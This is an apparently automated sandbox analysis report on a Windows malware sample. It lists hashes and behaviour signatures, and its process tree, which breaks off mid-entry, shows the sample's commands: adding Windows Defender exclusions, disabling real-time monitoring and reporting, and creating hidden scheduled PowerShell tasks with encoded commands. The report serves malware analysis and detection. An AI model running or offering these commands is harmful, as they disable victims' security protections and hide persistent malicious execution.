Analysis

  • max time kernel
    150s
  • max time network
    160s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    05-11-2024 15:23

General

  • Target

    9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe

  • Size

    6.3MB

  • MD5

    ded964e022a37d93d434091ec75f9881

  • SHA1

    e89a551ac1f19dc3838e21157667e2f98d84d06b

  • SHA256

    9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde

  • SHA512

    13f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af

  • SSDEEP

    196608:91OEVXHF+E/eq7QuIUVUMxVuAK1X84eu/k9RD13q:3OEVV+tq7Q7U62AAi84VkF13q

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 36 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops file in System32 directory 19 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
    "C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2304
    • C:\Users\Admin\AppData\Local\Temp\7zSFA94.tmp\Install.exe
      .\Install.exe /S /site_id "525403"
      2⤵
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      PID:2532
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\Windows\SysWOW64\cmd.exe
          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2736
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2656
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            5⤵
              PID:3012
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
          3⤵
          • Indirect Command Execution
          • Suspicious use of WriteProcessMemory
          PID:2900
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2780
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
              5⤵
                PID:2956
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                5⤵
                  PID:2824
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /CREATE /TN "gLzVBWIgV" /SC once /ST 00:06:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
              3⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:3024
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /run /I /tn "gLzVBWIgV"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:2792
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /DELETE /F /TN "gLzVBWIgV"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1980
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 15:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\ClNtMly.exe\" q8 /site_id 525403 /S" /V1 /F
              3⤵
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2516
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {0655DAAD-6F5F-4A34-8F95-4C4D56EC608D} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
          1⤵
            PID:2932
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2684
              • C:\Windows\system32\gpupdate.exe
                "C:\Windows\system32\gpupdate.exe" /force
                3⤵
                  PID:2600
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:756
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  3⤵
                    PID:2420
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                  2⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:880
                  • C:\Windows\system32\gpupdate.exe
                    "C:\Windows\system32\gpupdate.exe" /force
                    3⤵
                      PID:2536
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2204
                    • C:\Windows\system32\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      3⤵
                        PID:2264
                  • C:\Windows\system32\gpscript.exe
                    gpscript.exe /RefreshSystemParam
                    1⤵
                      PID:2800
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {281BC4EB-4259-4C9D-B51E-F425DE9CE6F5} S-1-5-18:NT AUTHORITY\System:Service:
                      1⤵
                        PID:2096
                        • C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\ClNtMly.exe
                          C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\ClNtMly.exe q8 /site_id 525403 /S
                          2⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          • System Location Discovery: System Language Discovery
                          PID:1172
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /CREATE /TN "gtIocxGWU" /SC once /ST 08:16:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                            3⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:2816
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /run /I /tn "gtIocxGWU"
                            3⤵
                              PID:2392
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /DELETE /F /TN "gtIocxGWU"
                              3⤵
                                PID:932
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2488
                                • C:\Windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                  4⤵
                                  • Modifies Windows Defender Real-time Protection settings
                                  PID:672
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                3⤵
                                  PID:236
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                    4⤵
                                    • Modifies Windows Defender Real-time Protection settings
                                    • System Location Discovery: System Language Discovery
                                    PID:1976
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "gSIHJrnHQ" /SC once /ST 04:15:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                  3⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:856
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /run /I /tn "gSIHJrnHQ"
                                  3⤵
                                    PID:1360
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "gSIHJrnHQ"
                                    3⤵
                                      PID:2676
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2664
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        • System Location Discovery: System Language Discovery
                                        PID:1620
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2680
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:772
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:320
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                          PID:2688
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                        3⤵
                                          PID:2672
                                          • C:\Windows\SysWOW64\reg.exe
                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2800
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /C copy nul "C:\Windows\Temp\YSrBLfWUtIHnuviW\CcixBScH\jSYlquazcXtEsxQJ.wsf"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3000
                                        • C:\Windows\SysWOW64\wscript.exe
                                          wscript "C:\Windows\Temp\YSrBLfWUtIHnuviW\CcixBScH\jSYlquazcXtEsxQJ.wsf"
                                          3⤵
                                          • Modifies data under HKEY_USERS
                                          PID:2916
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            PID:1408
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            PID:1648
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2972
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:800
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            PID:852
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2980
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2364
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:1900
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2660
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:1068
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:920
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2412
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:1608
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:1644
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:2448
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                            • Windows security bypass
                                            • System Location Discovery: System Language Discovery
                                            PID:868
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2940
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                              PID:1080
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:340
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1520
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1480
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:276
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:968
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2004
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1704
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                  PID:1748
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:3016
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:2040
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1412
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2356
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2352
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2368
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "gfJCWDASL" /SC once /ST 11:23:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:236
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /run /I /tn "gfJCWDASL"
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:544
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /DELETE /F /TN "gfJCWDASL"
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2536
                                                  • C:\Windows\SysWOW64\cmd.exe
